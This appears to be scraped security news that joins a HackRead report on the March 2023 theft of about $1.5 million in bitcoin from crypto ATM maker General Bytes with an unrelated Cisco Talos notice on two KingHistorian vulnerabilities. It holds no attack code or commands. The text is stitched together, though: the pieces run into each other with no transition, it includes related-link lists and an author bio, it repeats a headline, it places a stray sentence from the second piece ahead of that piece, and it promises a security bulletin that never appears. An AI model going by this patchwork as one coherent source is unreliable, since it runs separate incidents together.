The company has disclosed the wallet addresses and three IP addresses used by the attacker in the hack.
This is a post from HackRead.com Read the original post: Crypto ATM Manufacturer General Bytes Suffers $1.5m Bitcoin Theft

****The hacker was able to download usernames, access password hashes, turn off two-factor authentication, and send funds from hot wallets.****

On March 17th, 2023, General Bytes, a major manufacturer of cryptocurrency automated teller machines (ATMs), experienced a security incident that resulted in the theft of over $1.5 million worth of Bitcoin. The incident was first reported by General Bytes on their official Twitter account on March 18th.

On Saturday, the company explained, “We released a statement urging customers to take immediate action to protect their personal information. We urge all our customers to take immediate action to protect their funds and personal information and carefully read the security bulletin.”

According to the company’s security bulletin, an attacker was able to remotely upload a Java application using the master service interface, which allowed access to BATM user privileges, the database, and API keys used to access funds in hot wallets and exchanges.

As a result, the hacker was able to download usernames, access password hashes, turn off two-factor authentication, and send funds from hot wallets.

General Bytes has produced 9,505 ATM machines globally, thousands of which are located in the US. However, following the attack, all US operators using General Bytes machines were shut down, and the servers will have to be rebuilt from scratch.

General Bytes is reportedly transitioning crypto ATM operators to self-hosted servers after discontinuing its cloud service. This process can be time-consuming, and it is likely that some operators will be offline for an extended period.

The hacker was able to steal 56.28 bitcoin, worth around $1.5 million, and liquidated other cryptocurrencies, including ETH, USDT, BUSD, ADA, DAI, DOGE, SHIB, and TRX. The bitcoin address holding the stolen funds has not moved since March 18, and some digital currencies were transferred to different locations, including a decentralized exchange platform.

The company has disclosed the wallet addresses and three IP addresses used by the attacker in the hack. However, some sources have indicated that the company’s full node is secure enough to prevent unauthorized access to funds.

If you or someone you know has been affected by this incident, follow the solution detailed in General Bytes’ security bulletin, which can also be found below:

A user on Twitter speculated similar sentiments stating that it is likely that the attack was conducted by an individual familiar with the cryptocurrency ATM industry.

“This was made by somebody that knows the system very well, a crypto ATM company/ rogue employee that owns GB ATMs. Is not like the hacker go with a USB stick and plugs it into the ATM and uploads the attack,” they said.

Nonetheless, the breach highlights the need for increased security measures in the cryptocurrency industry to prevent future attacks.

1.  ATMJackpot Malware Stealing Cash From ATMs
2.  OpenSea flaw allowed crypto theft with malicious NFTs
3.  You can now buy ATM malware on Dark Web for $5000
4.  Access:7 Supply Chain Flaws Impact ATMs, IoT devices
5.  ATM bombing suspect blew himself while filming tutorial

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Crypto ATM Manufacturer General Bytes Suffers $1.5m Bitcoin Theft

If an adversary could capture an authentication packet, it contains all the necessary information to steal the target user’s username and password for the software.

Tuesday, March 21, 2023 09:03

_Carl Hurd of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered two vulnerabilities in WellinTech’s KingHistorian industrial control systems data manager.

KingHistorian is a time-series database that allows users to ingest and process large amounts of data from ICS, including built-in statistical analysis.

Talos discovered an information disclosure vulnerability (TALOS-2022-1683/CVE-2022-45124) in the software’s user authentication function. If an adversary could capture an authentication packet, it contains all the necessary information to steal the target user’s username and password for the software.

Another vulnerability, TALOS-2022-1674 (CVE-2022-43663) exists in a DLL in the software that could allow an adversary to cause a buffer overflow by sending a malicious packet to the targeted machine.

Cisco Talos worked with WellinTech to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: WellinTech KingHistorian, version 35.01.00.05. Talos tested and confirmed these versions of KingHistorian could be exploited by these vulnerabilities.

The following Snort rule will detect exploitation attempts against this vulnerability: 61093. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Tag

#mac